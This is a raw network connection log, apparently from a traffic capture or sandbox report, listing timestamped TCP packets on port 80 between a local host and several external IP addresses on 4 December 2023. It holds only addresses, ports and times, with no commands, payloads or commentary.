                                                                                                                              Dec 4, 2023 15:27:09.686672926 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.686713934 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.686733961 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.686750889 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.686769009 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.686784029 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.686924934 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.686924934 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.686956882 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.686979055 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.687179089 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:10.705523968 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:11.721046925 CET5020080192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:11.838259935 CET8050200108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:11.838596106 CET5020080192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:11.838695049 CET5020080192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:11.955594063 CET8050200108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:12.063363075 CET8050200108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:12.063431025 CET8050200108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:12.063834906 CET5020080192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:12.063900948 CET5020080192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:12.180891991 CET8050200108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:17.079224110 CET5020180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:17.252422094 CET8050201198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:17.252652884 CET5020180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:17.252863884 CET5020180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:17.427243948 CET8050201198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:17.570305109 CET8050201198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:17.570374012 CET8050201198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:17.570607901 CET5020180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:18.766181946 CET5020180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:19.781738997 CET5020280192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:19.957411051 CET8050202198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:19.957659960 CET5020280192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:19.957865000 CET5020280192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:20.133464098 CET8050202198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:20.273545980 CET8050202198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:20.273619890 CET8050202198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:20.273801088 CET5020280192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:21.468708038 CET5020280192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:22.484203100 CET5020380192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:22.660059929 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:22.660478115 CET5020380192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:22.661860943 CET5020380192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:22.838632107 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:22.838655949 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:22.838671923 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:22.838685989 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:22.838699102 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:22.838715076 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:22.838819981 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:22.838954926 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:22.839776039 CET5020380192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:22.839951038 CET5020380192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:22.840095043 CET5020380192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:23.015650988 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.015717030 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.015765905 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.015940905 CET5020380192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:23.016134024 CET5020380192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:23.016303062 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.016355991 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.016398907 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.016602039 CET5020380192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:23.016760111 CET5020380192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:23.016863108 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.016908884 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.017080069 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.017246962 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.017405033 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.060808897 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.192848921 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.192915916 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.193160057 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.193481922 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.193542957 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.364418030 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.364494085 CET8050203198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:23.364727974 CET5020380192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:24.171240091 CET5020380192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:25.186872959 CET5020480192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:25.361200094 CET8050204198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:25.361505985 CET5020480192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:25.361690044 CET5020480192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:25.537130117 CET8050204198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:25.693751097 CET8050204198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:25.693819046 CET8050204198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:25.694350004 CET5020480192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:25.694428921 CET5020480192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:27:25.868676901 CET8050204198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:30.701275110 CET5020580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:30.867758036 CET8050205198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:30.868036032 CET5020580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:30.868264914 CET5020580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:31.034668922 CET8050205198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:31.034743071 CET8050205198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:31.034790993 CET8050205198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:31.035237074 CET5020580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:32.372549057 CET5020580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:33.388114929 CET5020680192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:33.555721998 CET8050206198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:33.556003094 CET5020680192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:33.556193113 CET5020680192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:33.726406097 CET8050206198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:33.726489067 CET8050206198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:33.726505041 CET8050206198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:33.726792097 CET5020680192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:35.059510946 CET5020680192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:36.074979067 CET5020780192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:36.241081953 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.241343021 CET5020780192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:36.242688894 CET5020780192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:36.409130096 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.409225941 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.409306049 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.409351110 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.409405947 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.409446955 CET5020780192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:36.409583092 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.409630060 CET5020780192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:36.409653902 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.409698009 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.409729004 CET5020780192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:36.409960985 CET5020780192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:36.409975052 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.410342932 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.575792074 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.575869083 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.575925112 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.576035023 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.576103926 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.576158047 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.576203108 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.576437950 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.576524973 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:36.576632977 CET8050207198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:38.762048960 CET5020880192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:38.928272963 CET8050208198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:38.928504944 CET5020880192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:38.928668022 CET5020880192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:39.094922066 CET8050208198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:39.101649046 CET8050208198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:39.102727890 CET8050208198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:39.102973938 CET5020880192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:39.102973938 CET5020880192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:39.269068956 CET8050208198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:44.104540110 CET5020980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:44.286956072 CET805020991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:44.287201881 CET5020980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:44.287436008 CET5020980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:44.470504999 CET805020991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:44.470577002 CET805020991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:44.470788002 CET5020980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:45.791460037 CET5020980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:46.807050943 CET5021080192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:46.989248037 CET805021091.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:46.989525080 CET5021080192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:46.989672899 CET5021080192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:47.172646046 CET805021091.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:47.172689915 CET805021091.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:47.172919035 CET5021080192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:48.493994951 CET5021080192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.509608984 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.692255974 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.692608118 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.693974018 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.694056034 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.880268097 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880346060 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880403042 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880454063 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880498886 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880557060 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880580902 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.880662918 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880714893 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880732059 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.880760908 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880814075 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880892038 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.881072044 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.881072044 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:50.063167095 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063244104 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063299894 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063345909 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063393116 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063421965 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:50.063553095 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:50.063630104 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063699007 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063867092 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.064382076 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.064433098 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.245707989 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.245788097 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.245841026 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.245888948 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.246258020 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.246334076 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.246567011 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:51.196511030 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.212259054 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.394535065 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.394915104 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.395113945 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.615515947 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615612984 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615680933 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615756035 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615813017 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615834951 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.615874052 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615931034 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615986109 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615988970 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.616038084 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.616050005 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.616111994 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.616209030 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.616352081 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.798149109 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798304081 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798430920 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798552036 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798566103 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.798666954 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798789978 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798830986 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.798861027 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798922062 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.799025059 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.799364090 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.799433947 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.981575966 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:58.009862900 CET5021380192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:27:58.198178053 CET8050213217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:58.198437929 CET5021380192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:27:58.198612928 CET5021380192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:27:58.396634102 CET8050213217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:58.402602911 CET8050213217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:58.402642012 CET8050213217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:58.402786016 CET5021380192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:27:59.710365057 CET5021380192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:00.725863934 CET5021480192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:00.914251089 CET8050214217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:00.914402008 CET5021480192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:00.914663076 CET5021480192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:01.103141069 CET8050214217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:01.109859943 CET8050214217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:01.109924078 CET8050214217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:01.110393047 CET5021480192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:02.428484917 CET5021480192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.444132090 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.632354021 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.632617950 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.633934021 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.822387934 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.822479963 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.822523117 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.822649002 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.822666883 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.822734118 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.822783947 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.822786093 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.822829008 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.823013067 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.823029041 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.823177099 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.823226929 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.823271036 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.823347092 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.823415041 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.823527098 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.823697090 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:04.011122942 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011214972 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011280060 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011322975 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011367083 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011384010 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:04.011426926 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011470079 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:04.011538029 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:04.011706114 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011749983 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:04.011778116 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011822939 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011867046 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011924982 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.012079954 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.012233973 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.012298107 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.012339115 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.012487888 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.012552023 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.012651920 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.012695074 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.012839079 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.199528933 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.199876070 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.199976921 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.200371981 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.200485945 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.200822115 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.200860023 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.200886965 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.200930119 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.200956106 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.201320887 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.201364040 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.203397036 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.203438044 CET8050215217.160.0.27192.168.11.20
